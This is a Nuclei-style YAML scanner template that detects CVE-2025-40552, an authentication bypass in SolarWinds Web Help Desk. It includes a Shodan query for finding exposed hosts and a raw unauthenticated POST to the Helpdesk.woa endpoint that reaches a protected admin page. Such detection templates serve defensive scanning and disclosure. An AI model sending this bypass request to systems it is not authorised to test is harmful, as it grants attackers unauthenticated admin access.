id: CVE-2025-40552

info:
  name: SolarWinds Web Help Desk - Authentication Bypass
  author: watchTowr,DhiyaneshDk
  severity: critical
  description: |
    SolarWinds Web Help Desk contains an authentication bypass vulnerability caused by improper access control, letting attackers execute protected actions without authentication. Exploitation requires no special conditions.
  impact: |
    Attackers can execute protected actions without authentication, potentially compromising system integrity and data security.
  remediation: Update to the latest version of SolarWinds Web Help Desk.
  reference:
    - https://github.com/watchtowrlabs/watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553
    - https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40552
    - https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
    - https://nvd.nist.gov/vuln/detail/CVE-2025-40552
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-40552
    cwe-id: CWE-1390
    epss-score: 0.08551
    epss-percentile: 0.92536
  metadata:
    verified: true
    max-request: 2
    vendor: solarwinds
    product: web_help_desk
    shodan-query: http.favicon.hash:"1895809524"
  tags: cve,cve2025,solarwinds,web-help-desk,auth-bypass

# Request 1 fingerprints the Web Help Desk front page; request 2 only runs if it matched.
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'helpdesk','WebObjects')"
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /helpdesk/WebObjects/Helpdesk.woa/wo/1.2 HTTP/1.1
        Host: {{Hostname}}

        wopage=LookAndFeelPref

    # A protected admin page rendered for an unauthenticated request indicates the bypass.
    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'Add File','saveOptions')"
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502204fd941c94c7cd109dc786e66dcea9e2328ec21dd80a679fb885a8b8725a72689022100ee21b2eaec0faa46e4ef370d79424255796becf7ff427bbf5101b8deb48cc74b:922c64590222798bb761d5b6d8e72950